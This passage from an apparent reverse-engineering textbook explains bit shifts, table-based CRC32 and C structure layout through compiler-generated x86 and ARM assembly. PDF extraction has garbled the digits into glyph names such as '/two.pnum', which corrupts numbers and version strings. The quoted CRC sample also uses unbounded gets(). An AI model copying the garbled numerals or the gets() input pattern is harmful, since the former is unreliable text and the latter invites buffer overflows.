ment will consequently produce all possible bit positions in /three.pnum/two.pnum-bit number. By the way, freed bit at right is always
cleared.IS_SET macro is checking bit presence in a.
Figure /one.pnum./one.pnum: How SHLinstruction works/eight.pnum/six.pnum
/eight.pnum/five.pnumIt was LLVM build /two.pnum/four.pnum/one.pnum/zero.pnum./two.pnum./zero.pnum/zero.pnum bundled with Apple Xcode /four.pnum./six.pnum./three.pnum
/eight.pnum/six.pnumillustration taken from wikipedia
/eight.pnum/eight.pnum
TheIS_SET macro is in fact logical and operation ( AND) and it returns zero if specific bit is absent there, or bit
mask, if the bit is present. if()operator triggered in C/C++ if expression in it isn’t zero, it might be even 123456 ,
that’s why it always working correctly.
x/eight.pnum/six.pnum
Let’s compile (MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum):
Listing /one.pnum./seven.pnum/three.pnum: MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum
_rt$ = -8 ; size = 4
_i$ = -4 ; size = 4
_a$ = 8 ; size = 4
_f PROC
push ebp
mov ebp, esp
sub esp, 8
mov DWORD PTR _rt$[ebp], 0
mov DWORD PTR _i$[ebp], 0
jmp SHORT $LN4@f
$LN3@f:
mov eax, DWORD PTR _i$[ebp] ; increment of 1
add eax, 1
mov DWORD PTR _i$[ebp], eax
$LN4@f:
cmp DWORD PTR _i$[ebp], 32 ; 00000020H
jge SHORT $LN2@f ; loop finished?
mov edx, 1
mov ecx, DWORD PTR _i$[ebp]
shl edx, cl ; EDX=EDX<<CL
and edx, DWORD PTR _a$[ebp]
je SHORT $LN1@f ; result of AND instruction was 0?
; then skip next instructions
mov eax, DWORD PTR _rt$[ebp] ; no, not zero
add eax, 1 ; increment rt
mov DWORD PTR _rt$[ebp], eax
$LN1@f:
jmp SHORT $LN3@f
$LN2@f:
mov eax, DWORD PTR _rt$[ebp]
mov esp, ebp
pop ebp
ret 0
_f ENDP
That’s how SHL ( SHi/f_t Le/f_t ) working.
Let’s compile it in GCC /four.pnum./four.pnum./one.pnum:
Listing /one.pnum./seven.pnum/four.pnum: GCC /four.pnum./four.pnum./one.pnum
public f
f proc near
rt = dword ptr -0Ch
i = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
sub esp, 10h
mov [ebp+rt], 0
mov [ebp+i], 0
jmp short loc_80483EF
loc_80483D0:
mov eax, [ebp+i]
/eight.pnum/nine.pnum
mov edx, 1
mov ebx, edx
mov ecx, eax
shl ebx, cl
mov eax, ebx
and eax, [ebp+arg_0]
test eax, eax
jz short loc_80483EB
add [ebp+rt], 1
loc_80483EB:
add [ebp+i], 1
loc_80483EF:
cmp [ebp+i], 1Fh
jle short loc_80483D0
mov eax, [ebp+rt]
add esp, 10h
pop ebx
pop ebp
retn
f endp
Shi/f_t instructions are o/f_ten used in division and multiplications by power of two numbers ( 1,2,4,8, etc).
For example:
unsigned int f(unsigned int a)
{
return a/4;
};
We got (MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum):
Listing /one.pnum./seven.pnum/five.pnum: MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum
_a$ = 8 ; size = 4
_f PROC
mov eax, DWORD PTR _a$[esp-4]
shr eax, 2
ret 0
_f ENDP
SHR(SHi/f_t Right ) instruction in this example is shi/f_ting a number by /two.pnum bits right. Two freed bits at le/f_t (e.g., two
most significant bits) are set to zero. Two least significant bits are dropped. In fact, these two dropped bits —
division operation remainder.
SHRinstruction works just like as SHLbut in other direction.
Figure /one.pnum./two.pnum: How SHRinstruction works/eight.pnum/seven.pnum
It can be easily understood if to imagine decimal numeral system and number 23.23can be easily divided by
10just by dropping last digit ( 3— is division remainder). 2is leaving a/f_ter operation as a quotient/eight.pnum/eight.pnum.
The same story about multiplication. Multiplication by 4is just shi/f_ting the number to the le/f_t by /two.pnum bits, inserting
/two.pnum zero bits at right (as the last two bits). It’s just like to multiply 3by100 — we need just to add two zeroes at the
right.
/eight.pnum/seven.pnumillustration taken from wikipedia
/eight.pnum/eight.pnumdivision result
/nine.pnum/zero.pnum
ARM + Optimizing Xcode (LLVM) + ARM mode
Listing /one.pnum./seven.pnum/six.pnum: Optimizing Xcode (LLVM) + ARM mode
MOV R1, R0
MOV R0, #0
MOV R2, #1
MOV R3, R0
loc_2E54
TST R1, R2,LSL R3 ; set flags according to R1 & (R2<<R3)
ADD R3, R3, #1 ; R3++
ADDNE R0, R0, #1 ; if ZF flag is cleared by TST, R0++
CMP R3, #32
BNE loc_2E54
BX LR
TSTis the same things as TEST in x/eight.pnum/six.pnum.
As I mentioned before /one.pnum./one.pnum/two.pnum./one.pnum, there are no separate shi/f_ting instructions in ARM mode. However, there are modi-
fiers LSL ( Logical Shi/f_t Le/f_t ), LSR ( Logical Shi/f_t Right ), ASR ( Arithmetic Shi/f_t Right ), ROR ( Rotate Right ) and RRX ( Rotate
Right with Extend ) , which may be added to such instructions as MOV,TST,CMP,ADD,SUB,RSB/eight.pnum/nine.pnum.
These modificators are defines, how to shi/f_t second operand and by how many bits.
Thus“TST R1, R2,LSL R3” instruction works here as R1∧(R2≪R3).
ARM + Optimizing Xcode (LLVM) + thumb-/two.pnum mode
Almost the same, but here are two LSL.W /TSTinstructions are used instead of single TST, becase, in thumb mode,
it’s not possible to define LSLmodifier right in TST.
MOV R1, R0
MOVS R0, #0
MOV.W R9, #1
MOVS R3, #0
loc_2F7A
LSL.W R2, R9, R3
TST R2, R1
ADD.W R3, R3, #1
IT NE
ADDNE R0, #1
CMP R3, #32
BNE loc_2F7A
BX LR
/one.pnum./one.pnum/five.pnum./four.pnum CRC/three.pnum/two.pnum calculation example
This is very popular table-based CRC/three.pnum/two.pnum hash calculation method/nine.pnum/zero.pnum.
/* By Bob Jenkins, (c) 2006, Public Domain */
#include <stdio.h>
#include <stddef.h>
#include <string.h>
typedef unsigned long ub4;
typedef unsigned char ub1;
static const ub4 crctab[256] = {
0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f,
0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988,
0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 0x1db71064, 0x6ab020f2,
0xf3b97148, 0x84be41de, 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7,
/eight.pnum/nine.pnumThese instructions are also called “data processing instructions”
/nine.pnum/zero.pnumSource code was taken here: http://burtleburtle.net/bob/c/crc.c
/nine.pnum/one.pnum
0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9,
0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172,
0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 0x35b5a8fa, 0x42b2986c,
0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59,
0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423,
0xcfba9599, 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924,
0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190, 0x01db7106,
0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433,
0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d,
0x91646c97, 0xe6635c01, 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e,
0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950,
0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65,
0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7,
0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0,
0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa,
0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f,
0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81,
0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a,
0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 0xe3630b12, 0x94643b84,
0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1,
0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb,
0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc,
0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 0xd6d6a3e8, 0xa1d1937e,
0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b,
0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55,
0x316e8eef, 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236,
0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe, 0xb2bd0b28,
0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d,
0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f,
0x72076785, 0x05005713, 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38,
0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242,
0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777,
0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 0x8f659eff, 0xf862ae69,
0x616bffd3, 0x166ccf45, 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2,
0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc,
0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9,
0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, 0xcdd70693,
0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94,
0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d,
};
/* how to derive the values in crctab[] from polynomial 0xedb88320 */
void build_table()
{
ub4 i, j;
for (i=0; i<256; ++i) {
j = i;
j = (j>>1) ^ ((j&1) ? 0xedb88320 : 0);
j = (j>>1) ^ ((j&1) ? 0xedb88320 : 0);
j = (j>>1) ^ ((j&1) ? 0xedb88320 : 0);
j = (j>>1) ^ ((j&1) ? 0xedb88320 : 0);
j = (j>>1) ^ ((j&1) ? 0xedb88320 : 0);
j = (j>>1) ^ ((j&1) ? 0xedb88320 : 0);
j = (j>>1) ^ ((j&1) ? 0xedb88320 : 0);
j = (j>>1) ^ ((j&1) ? 0xedb88320 : 0);
printf("0x%.8lx, ", j);
if (i%6 == 5) printf("\n");
}
}
/* the hash function */
ub4 crc(const void *key, ub4 len, ub4 hash)
{
ub4 i;
const ub1 *k = key;
/nine.pnum/two.pnum
for (hash=len, i=0; i<len; ++i)
hash = (hash >> 8) ^ crctab[(hash & 0xff) ^ k[i]];
return hash;
}
/* To use, try "gcc -O crc.c -o crc; crc < crc.c" */
int main()
{
char s[1000];
while (gets(s)) printf("%.8lx\n", crc(s, strlen(s), 0));
return 0;
}
We are interesting in crc() function only. By the way, pay attention to two loop initializers in for() state-
ment:hash=len, i=0 . C/C++ standard allows this, of course. Emited code will contain two operations in loop
initialization part instead of usual one.
Let’s compile it in MSVC with optimization ( /Ox). For the sake of brevity, only crc() function is listed here, with
my comments.
_key$ = 8 ; size = 4
_len$ = 12 ; size = 4
_hash$ = 16 ; size = 4
_crc PROC
mov edx, DWORD PTR _len$[esp-4]
xor ecx, ecx ; i will be stored in ECX
mov eax, edx
test edx, edx
jbe SHORT $LN1@crc
push ebx
push esi
mov esi, DWORD PTR _key$[esp+4] ; ESI = key
push edi
$LL3@crc:
; work with bytes using only 32-bit registers. byte from address key+i we store into EDI
movzx edi, BYTE PTR [ecx+esi]
mov ebx, eax ; EBX = (hash = len)
and ebx, 255 ; EBX = hash & 0xff
; XOR EDI, EBX (EDI=EDI^EBX) - this operation uses all 32 bits of each register
; but other bits (8-31) are cleared all time, so it’s OK
; these are cleared because, as for EDI, it was done by MOVZX instruction above
; high bits of EBX was cleared by AND EBX, 255 instruction above (255 = 0xff)
xor edi, ebx
; EAX=EAX>>8; bits 24-31 taken "from nowhere" will be cleared
shr eax, 8
; EAX=EAX^crctab[EDI*4] - choose EDI-th element from crctab[] table
xor eax, DWORD PTR _crctab[edi*4]
inc ecx ; i++
cmp ecx, edx ; i<len ?
jb SHORT $LL3@crc ; yes
pop edi
pop esi
pop ebx
$LN1@crc:
ret 0
_crc ENDP
Let’s try the same in GCC /four.pnum./four.pnum./one.pnum with -O3option:
public crc
crc proc near
/nine.pnum/three.pnum
key = dword ptr 8
hash = dword ptr 0Ch
push ebp
xor edx, edx
mov ebp, esp
push esi
mov esi, [ebp+key]
push ebx
mov ebx, [ebp+hash]
test ebx, ebx
mov eax, ebx
jz short loc_80484D3
nop ; padding
lea esi, [esi+0] ; padding; ESI doesn’t changing here
loc_80484B8:
mov ecx, eax ; save previous state of hash to ECX
xor al, [esi+edx] ; AL=*(key+i)
add edx, 1 ; i++
shr ecx, 8 ; ECX=hash>>8
movzx eax, al ; EAX=*(key+i)
mov eax, dword ptr ds:crctab[eax*4] ; EAX=crctab[EAX]
xor eax, ecx ; hash=EAX^ECX
cmp ebx, edx
ja short loc_80484B8
loc_80484D3:
pop ebx
pop esi
pop ebp
retn
crc endp
\
GCC aligned loop start by /eight.pnum-byte border by adding NOPandlea esi, [esi+0] (that’s idle operation too). Read
more about it in npad section /two.pnum./three.pnum.
/nine.pnum/four.pnum
/one.pnum./one.pnum/six.pnum Structures
It can be defined that C/C++ structure, with some assumptions, just a set of variables, always stored in memory
together, not necessary of the same type.
/one.pnum./one.pnum/six.pnum./one.pnum SYSTEMTIME example
Let’s take SYSTEMTIME/nine.pnum/one.pnumwin/three.pnum/two.pnum structure describing time.
That’s how it’s defined:
Listing /one.pnum./seven.pnum/seven.pnum: WinBase.h
typedef struct _SYSTEMTIME {
WORD wYear;
WORD wMonth;
WORD wDayOfWeek;
WORD wDay;
WORD wHour;
WORD wMinute;
WORD wSecond;
WORD wMilliseconds;
} SYSTEMTIME, *PSYSTEMTIME;
Let’s write a C function to get current time:
#include <windows.h>
#include <stdio.h>
void main()
{
SYSTEMTIME t;
GetSystemTime (&t);
printf ("%04d-%02d-%02d %02d:%02d:%02d\n",
t.wYear, t.wMonth, t.wDay,
t.wHour, t.wMinute, t.wSecond);
return;
};
We got (MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum):
Listing /one.pnum./seven.pnum/eight.pnum: MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum
_t$ = -16 ; size = 16
_main PROC
push ebp
mov ebp, esp
sub esp, 16 ; 00000010H
lea eax, DWORD PTR _t$[ebp]
push eax
call DWORD PTR __imp__GetSystemTime@4
movzx ecx, WORD PTR _t$[ebp+12] ; wSecond
push ecx
movzx edx, WORD PTR _t$[ebp+10] ; wMinute
push edx
movzx eax, WORD PTR _t$[ebp+8] ; wHour
push eax
movzx ecx, WORD PTR _t$[ebp+6] ; wDay
push ecx
movzx edx, WORD PTR _t$[ebp+2] ; wMonth
push edx
movzx eax, WORD PTR _t$[ebp] ; wYear
push eax
/nine.pnum/one.pnumMSDN: SYSTEMTIME structure
/nine.pnum/five.pnum
push OFFSET $SG78811 ; ’%04d-%02d-%02d %02d:%02d:%02d’, 0aH, 00H
call _printf
add esp, 28 ; 0000001cH
xor eax, eax
mov esp, ebp
pop ebp
ret 0
_main ENDP
/one.pnum/six.pnum bytes are allocated for this structure in local stack — that’s exactly sizeof(WORD)*8 (there are /eight.pnum WORD
variables in the structure).
Pay attention to the fact the structure beginning with wYear field. It can be said, an pointer to SYSTEMTIME
structure is passed to GetSystemTime()/nine.pnum/two.pnum, but it’s also can be said, pointer to wYear field is passed, and that’s the
same!GetSystemTime() writting current year to the WORD pointer pointing to, then shi/f_ting /two.pnum bytes ahead, then
writting current month, etc, etc.
The fact that structure fields are just variables located side-by-side, I can illustrate by the following method.
Keeping in ming SYSTEMTIME structure description, I can rewrite this simple example like this:
#include <windows.h>
#include <stdio.h>
void main()
{
WORD array[8];
GetSystemTime (array);
printf ("%04d-%02d-%02d %02d:%02d:%02d\n",
array[0] /* wYear */, array[1] /* wMonth */, array[3] /* wDay */,
array[4] /* wHour */, array[5] /* wMinute */, array[6] /* wSecond */);
return;
};
Compiler will grumble for a little:
systemtime2.c(7) : warning C4133: ’function’ : incompatible types - from ’WORD [8]’ to ’LPSYSTEMTIME’
But nevertheless, it will produce this code:
Listing /one.pnum./seven.pnum/nine.pnum: MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum
$SG78573 DB ’%04d-%02d-%02d %02d:%02d:%02d’, 0aH, 00H
_array$ = -16 ; size = 16
_main PROC
push ebp
mov ebp, esp
sub esp, 16 ; 00000010H
lea eax, DWORD PTR _array$[ebp]
push eax
call DWORD PTR __imp__GetSystemTime@4
movzx ecx, WORD PTR _array$[ebp+12] ; wSecond
push ecx
movzx edx, WORD PTR _array$[ebp+10] ; wMinute
push edx
movzx eax, WORD PTR _array$[ebp+8] ; wHoure
push eax
movzx ecx, WORD PTR _array$[ebp+6] ; wDay
push ecx
movzx edx, WORD PTR _array$[ebp+2] ; wMonth
push edx
movzx eax, WORD PTR _array$[ebp] ; wYear
push eax
push OFFSET $SG78573
/nine.pnum/two.pnumMSDN: SYSTEMTIME structure
/nine.pnum/six.pnum
call _printf
add esp, 28 ; 0000001cH
xor eax, eax
mov esp, ebp
pop ebp
ret 0
_main ENDP
And it works just as the same!
It’s very interesting fact that result in assembly form cannot be distinguished from the result of previous com-
pilation. So by looking at this code, one cannot say for sure, was there structure declared, or just pack of variables.
Nevertheless, no one will do it in sane state of mind. Because it’s not handy. Also, structure fields may be
changed by developers, swapped, etc.
/one.pnum./one.pnum/six.pnum./two.pnum Let’s allocate place for structure using malloc()
However, sometimes it’s simpler to place structures not in local stack, but in heap:
#include <windows.h>
#include <stdio.h>
void main()
{
SYSTEMTIME *t;
t=(SYSTEMTIME *)malloc (sizeof (SYSTEMTIME));
GetSystemTime (t);
printf ("%04d-%02d-%02d %02d:%02d:%02d\n",
t->wYear, t->wMonth, t->wDay,
t->wHour, t->wMinute, t->wSecond);
free (t);
return;
};
Let’s compile it now with optimization ( /Ox) so to easily see what we need.
Listing /one.pnum./eight.pnum/zero.pnum: Optimizing MSVC
_main PROC
push esi
push 16 ; 00000010H
call _malloc
add esp, 4
mov esi, eax
push esi
call DWORD PTR __imp__GetSystemTime@4
movzx eax, WORD PTR [esi+12] ; wSecond
movzx ecx, WORD PTR [esi+10] ; wMinute
movzx edx, WORD PTR [esi+8] ; wHour
push eax
movzx eax, WORD PTR [esi+6] ; wDay
push ecx
movzx ecx, WORD PTR [esi+2] ; wMonth
push edx
movzx edx, WORD PTR [esi] ; wYear
push eax
push ecx
push edx
push OFFSET $SG78833
call _printf
push esi
/nine.pnum/seven.pnum
call _free
add esp, 32 ; 00000020H
xor eax, eax
pop esi
ret 0
_main ENDP
So,sizeof(SYSTEMTIME) = 16 , that’s exact number of bytes to be allocated by malloc() . It return the pointer
to freshly allocated memory block in EAX, which is then moved into ESI.GetSystemTime() win/three.pnum/two.pnum function under-
take to save ESIvalue, and that’s why it is not saved here and continue to be used a/f_ter GetSystemTime() call.
New instruction — MOVZX (Move with Zero eXtent ). It may be used almost in those cases as MOVSX /one.pnum./one.pnum/one.pnum./one.pnum, but, it
clearing other bits to 0. That’s because printf() require /three.pnum/two.pnum-bit int, but we got WORD in structure — that’s /one.pnum/six.pnum-bit
unsigned type. That’s why by copying value from WORD into int, bits from /one.pnum/six.pnum to /three.pnum/one.pnum should be cleared, because there
will be random noise otherwise, leaved from previous operations on registers.
In this example, I can represent structure as array of WORD-s:
#include <windows.h>
#include <stdio.h>
void main()
{
WORD *t;
t=(WORD *)malloc (16);
GetSystemTime (t);
printf ("%04d-%02d-%02d %02d:%02d:%02d\n",
t[0] /* wYear */, t[1] /* wMonth */, t[3] /* wDay */,
t[4] /* wHour */, t[5] /* wMinute */, t[6] /* wSecond */);
free (t);
return;
};
We got:
Listing /one.pnum./eight.pnum/one.pnum: Optimizing MSVC
$SG78594 DB ’%04d-%02d-%02d %02d:%02d:%02d’, 0aH, 00H
_main PROC
push esi
push 16 ; 00000010H
call _malloc
add esp, 4
mov esi, eax
push esi
call DWORD PTR __imp__GetSystemTime@4
movzx eax, WORD PTR [esi+12]
movzx ecx, WORD PTR [esi+10]
movzx edx, WORD PTR [esi+8]
push eax
movzx eax, WORD PTR [esi+6]
push ecx
movzx ecx, WORD PTR [esi+2]
push edx
movzx edx, WORD PTR [esi]
push eax
push ecx
push edx
push OFFSET $SG78594
call _printf
push esi
call _free
/nine.pnum/eight.pnum
add esp, 32 ; 00000020H
xor eax, eax
pop esi
ret 0
_main ENDP
Again, we got a code that cannot be distinguished from previous. And again I should note, one shouldn’t do
this in practice.
/one.pnum./one.pnum/six.pnum./three.pnum struct tm
Linux
As of Linux, let’s take tmstructure from time.h for example:
#include <stdio.h>
#include <time.h>
void main()
{
struct tm t;
time_t unix_time;
unix_time=time(NULL);
localtime_r (&unix_time, &t);
printf ("Year: %d\n", t.tm_year+1900);
printf ("Month: %d\n", t.tm_mon);
printf ("Day: %d\n", t.tm_mday);
printf ("Hour: %d\n", t.tm_hour);
printf ("Minutes: %d\n", t.tm_min);
printf ("Seconds: %d\n", t.tm_sec);
};
Let’s compile it in GCC /four.pnum./four.pnum./one.pnum:
main proc near
push ebp
mov ebp, esp
and esp, 0FFFFFFF0h
sub esp, 40h
mov dword ptr [esp], 0 ; first argument for time()
call time
mov [esp+3Ch], eax
lea eax, [esp+3Ch] ; take pointer to what time() returned
lea edx, [esp+10h] ; at ESP+10h struct tm will begin
mov [esp+4], edx ; pass pointer to the structure begin
mov [esp], eax ; pass pointer to result of time()
call localtime_r
mov eax, [esp+24h] ; tm_year
lea edx, [eax+76Ch] ; edx=eax+1900
mov eax, offset format ; "Year: %d\n"
mov [esp+4], edx
mov [esp], eax
call printf
mov edx, [esp+20h] ; tm_mon
mov eax, offset aMonthD ; "Month: %d\n"
mov [esp+4], edx
mov [esp], eax
call printf
mov edx, [esp+1Ch] ; tm_mday
mov eax, offset aDayD ; "Day: %d\n"
mov [esp+4], edx
mov [esp], eax
call printf
/nine.pnum/nine.pnum
mov edx, [esp+18h] ; tm_hour
mov eax, offset aHourD ; "Hour: %d\n"
mov [esp+4], edx
mov [esp], eax
call printf
mov edx, [esp+14h] ; tm_min
mov eax, offset aMinutesD ; "Minutes: %d\n"
mov [esp+4], edx
mov [esp], eax
call printf
mov edx, [esp+10h]
mov eax, offset aSecondsD ; "Seconds: %d\n"
mov [esp+4], edx ; tm_sec
mov [esp], eax
call printf
leave
retn
main endp
Somehow, IDA /five.pnum didn’t created local variables names in local stack. But since we already experienced reverse
engineers :-) we may do it without this information in this simple example.
Please also pay attention to lea edx, [eax+76Ch] — this instruction just adding 0x76CtoEAX, but not mod-
ify any flags. See also relevant section about LEA/two.pnum./one.pnum.
In order to illustrate that structure is just variables laying side-by-side in one place, let’s rework example, while
looking at the file time.h :
Listing /one.pnum./eight.pnum/two.pnum: time.h
struct tm
{
int tm_sec;
int tm_min;
int tm_hour;
int tm_mday;
int tm_mon;
int tm_year;
int tm_wday;
int tm_yday;
int tm_isdst;
};
#include <stdio.h>
#include <time.h>
void main()
{
int tm_sec, tm_min, tm_hour, tm_mday, tm_mon, tm_year, tm_wday, tm_yday, tm_isdst;
time_t unix_time;
unix_time=time(NULL);
localtime_r (&unix_time, &tm_sec);
printf ("Year: %d\n", tm_year+1900);
printf ("Month: %d\n", tm_mon);
printf ("Day: %d\n", tm_mday);
printf ("Hour: %d\n", tm_hour);
printf ("Minutes: %d\n", tm_min);
printf ("Seconds: %d\n", tm_sec);
};
Please note that pointer to exactly tm_sec is passed into localtime_r , i.e., to the first “structure” element.
Compiler will warn us:
Listing /one.pnum./eight.pnum/three.pnum: GCC /four.pnum./seven.pnum./three.pnum
/one.pnum/zero.pnum/zero.pnum
GCC_tm2.c: In function ’main’:
GCC_tm2.c:11:5: warning: passing argument 2 of ’localtime_r’ from incompatible pointer type [enabled by
default]
In file included from GCC_tm2.c:2:0:
/usr/include/time.h:59:12: note: expected ’struct tm *’ but argument is of type ’int *’
But nevertheless, will generate this:
Listing /one.pnum./eight.pnum/four.pnum: GCC /four.pnum./seven.pnum./three.pnum
main proc near
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
unix_time = dword ptr -1Ch
tm_sec = dword ptr -18h
tm_min = dword ptr -14h
tm_hour = dword ptr -10h
tm_mday = dword ptr -0Ch
tm_mon = dword ptr -8
tm_year = dword ptr -4
push ebp
mov ebp, esp
and esp, 0FFFFFFF0h
sub esp, 30h
call __main
mov [esp+30h+var_30], 0 ; arg 0
call time
mov [esp+30h+unix_time], eax
lea eax, [esp+30h+tm_sec]
mov [esp+30h+var_2C], eax
lea eax, [esp+30h+unix_time]
mov [esp+30h+var_30], eax
call localtime_r
mov eax, [esp+30h+tm_year]
add eax, 1900
mov [esp+30h+var_2C], eax
mov [esp+30h+var_30], offset aYearD ; "Year: %d\n"
call printf
mov eax, [esp+30h+tm_mon]
mov [esp+30h+var_2C], eax
mov [esp+30h+var_30], offset aMonthD ; "Month: %d\n"
call printf
mov eax, [esp+30h+tm_mday]
mov [esp+30h+var_2C], eax
mov [esp+30h+var_30], offset aDayD ; "Day: %d\n"
call printf
mov eax, [esp+30h+tm_hour]
mov [esp+30h+var_2C], eax
mov [esp+30h+var_30], offset aHourD ; "Hour: %d\n"
call printf
mov eax, [esp+30h+tm_min]
mov [esp+30h+var_2C], eax
mov [esp+30h+var_30], offset aMinutesD ; "Minutes: %d\n"
call printf
mov eax, [esp+30h+tm_sec]
mov [esp+30h+var_2C], eax
mov [esp+30h+var_30], offset aSecondsD ; "Seconds: %d\n"
call printf
leave
retn
main endp
This code is identical to what we saw previously and it’s not possible to say, was it structure in original source
code or just pack of variables.
/one.pnum/zero.pnum/one.pnum
And this works. However, it’s not recommended to do this in practice. Usually, compiler allocate variables in
local stack in the same order as they were declared in function. Nevertheless, there are no any guarantee.
By the way, some other compiler may warn that tm_year ,tm_mon ,tm_mday ,tm_hour ,tm_min variables, but
nottm_sec are used without being initialized. Indeed, compiler don’t know that these will be filled when calling
tolocaltime_r() .
I chose exactly this example for illustration, because all structure fields has inttype, and SYSTEMTIME structure
fields — /one.pnum/six.pnum-bit WORD , and if to declare them as a local variables, they will be aligned by /three.pnum/two.pnum-bit border, and nothing
will work (because GetSystemTime() will fill them incorrectly). Read more about it in next section: “Fields packing
in structure” .
So, structure is just variables pack laying on one place, side-by-side. I could say that structure is a syntactic
sugar, directing compiler to hold them in one place. However, I’m not programming languages expert, so, most
likely, I’m wrong with this term. By the way, there were a times, in very early C versions (before /one.pnum/nine.pnum/seven.pnum/two.pnum), in which
there were no structures at all [Rit/nine.pnum/three.pnum].
ARM + Optimizing Keil + thumb mode
Same example:
Listing /one.pnum./eight.pnum/five.pnum: Optimizing Keil + thumb mode
var_38 = -0x38
var_34 = -0x34
var_30 = -0x30
var_2C = -0x2C
var_28 = -0x28
var_24 = -0x24
timer = -0xC
PUSH {LR}
MOVS R0, #0 ; timer
SUB SP, SP, #0x34
BL time
STR R0, [SP,#0x38+timer]
MOV R1, SP ; tp
ADD R0, SP, #0x38+timer ; timer
BL localtime_r
LDR R1, =0x76C
LDR R0, [SP,#0x38+var_24]
ADDS R1, R0, R1
ADR R0, aYearD ; "Year: %d\n"
BL __2printf
LDR R1, [SP,#0x38+var_28]
ADR R0, aMonthD ; "Month: %d\n"
BL __2printf
LDR R1, [SP,#0x38+var_2C]
ADR R0, aDayD ; "Day: %d\n"
BL __2printf
LDR R1, [SP,#0x38+var_30]
ADR R0, aHourD ; "Hour: %d\n"
BL __2printf
LDR R1, [SP,#0x38+var_34]
ADR R0, aMinutesD ; "Minutes: %d\n"
BL __2printf
LDR R1, [SP,#0x38+var_38]
ADR R0, aSecondsD ; "Seconds: %d\n"
BL __2printf
ADD SP, SP, #0x34
POP {PC}
/one.pnum/zero.pnum/two.pnum
ARM + Optimizing Xcode (LLVM) + thumb-/two.pnum mode
IDA /five.pnum “get to know” tmstructure (because IDA /five.pnum “knows” argument types of library functions like localtime_r() ),
so it shows here structure elements accesses and also names are assigned to them.
Listing /one.pnum./eight.pnum/six.pnum: Optimizing Xcode (LLVM) + thumb-/two.pnum mode
var_38 = -0x38
var_34 = -0x34
PUSH {R7,LR}
MOV R7, SP
SUB SP, SP, #0x30
MOVS R0, #0 ; time_t *
BLX _time
ADD R1, SP, #0x38+var_34 ; struct tm *
STR R0, [SP,#0x38+var_38]
MOV R0, SP ; time_t *
